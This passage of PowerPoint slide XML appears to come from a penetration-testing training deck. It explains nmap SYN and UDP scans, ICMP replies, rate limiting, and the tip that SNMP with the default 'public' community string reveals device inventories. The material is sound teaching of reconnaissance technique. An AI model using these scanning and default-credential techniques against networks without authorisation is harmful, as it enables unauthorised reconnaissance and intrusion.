      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Shape 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="3474720"/>
            <a:ext cx="4114800" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="B174FB"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:headEnd type="triangle"/>
            <a:tailEnd type="none"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Text 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1737360" y="3163824"/>
            <a:ext cx="3383280"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Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>SYN / ACK</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Shape 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="4206240"/>
            <a:ext cx="4114800" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="701DF5"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:headEnd type="none"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1737360" y="3895344"/>
            <a:ext cx="3383280"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Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>RST</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Text 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1463040" y="4370832"/>
            <a:ext cx="4114800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1400"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>connection never completes, so many</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1400"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>applications never log it</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Text 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6720840" y="1572768"/>
            <a:ext cx="4937760" cy="3291840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1958"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1958"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1450" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Needs root. </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1958"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1450" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>nmap builds raw packets itself instead of asking the OS.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1450" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1958"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1958"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1450" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Fast. </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1958"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1450" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Three packets per port, thousands of ports in flight at once.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1450" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1958"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1958"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1450" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Quieter, not silent. </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1958"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1450" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Any firewall or IDS made in the last twenty years sees this immediately.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1450" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1958"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1958"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1450" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>This is the default </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1958"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1450" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>when you run nmap as root, so most of the time you get it whether you asked or not.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1450" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Shape 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="4983480"/>
            <a:ext cx="11091672" cy="1097280"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 5833"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1B1033"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="822960" y="5193792"/>
            <a:ext cx="10515600" cy="731520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>On the word stealth:  </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>The name is from 1997, when logging was worse. Today a SYN scan across 65535 ports is one of the loudest things you can do on a monitored network.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1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02 / SCANNING</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UDP scan   -sU   slow, but worth running</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17</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="1188720"/>
            <a:ext cx="11064240" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>-s chooses the scan type,  U is for UDP: there is no handshake, so nmap sends a datagram and waits</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1150" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Image 0" descr="img/t_udp.png">    </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="1481328"/>
            <a:ext cx="5806440" cy="3456432"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6675120" y="1554480"/>
            <a:ext cx="4956048" cy="3474720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1823"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1823"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>No handshake to abuse. </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1823"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>nmap sends a packet and waits. Silence could mean open, or filtered, or a dropped reply.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1823"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1823"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Closed ports answer with ICMP. </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1823"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Type 3 code 3, port unreachable. That is the only clear signal you get.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1823"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1823"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Linux rate limits those replies. </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1823"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>One per second is common, which is why a full UDP scan takes hours.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1823"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1823"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Scan the top 20 and move on. </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1823"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>53, 161 and 500 are where the findings are.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Shape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="5138928"/>
            <a:ext cx="11091672" cy="960120"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1B1033"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="822960" y="5303520"/>
            <a:ext cx="10515600" cy="640080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2100"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1450" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Why bother:  </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2100"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1450" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>SNMP on 161/udp with the community string "public" gives you the full inventory of a device, and almost nobody scans for it. Skipping UDP is how pentesters miss the easiest finding in the report.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="14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02 / SCANNING</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The other scan types, and when they matter</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18</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="1188720"/>
            <a:ext cx="11064240" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>All of them start with -s for scan type. The letter says which packet nmap sends</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1150" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Shape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="1755648"/>
            <a:ext cx="11091672" cy="603504"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
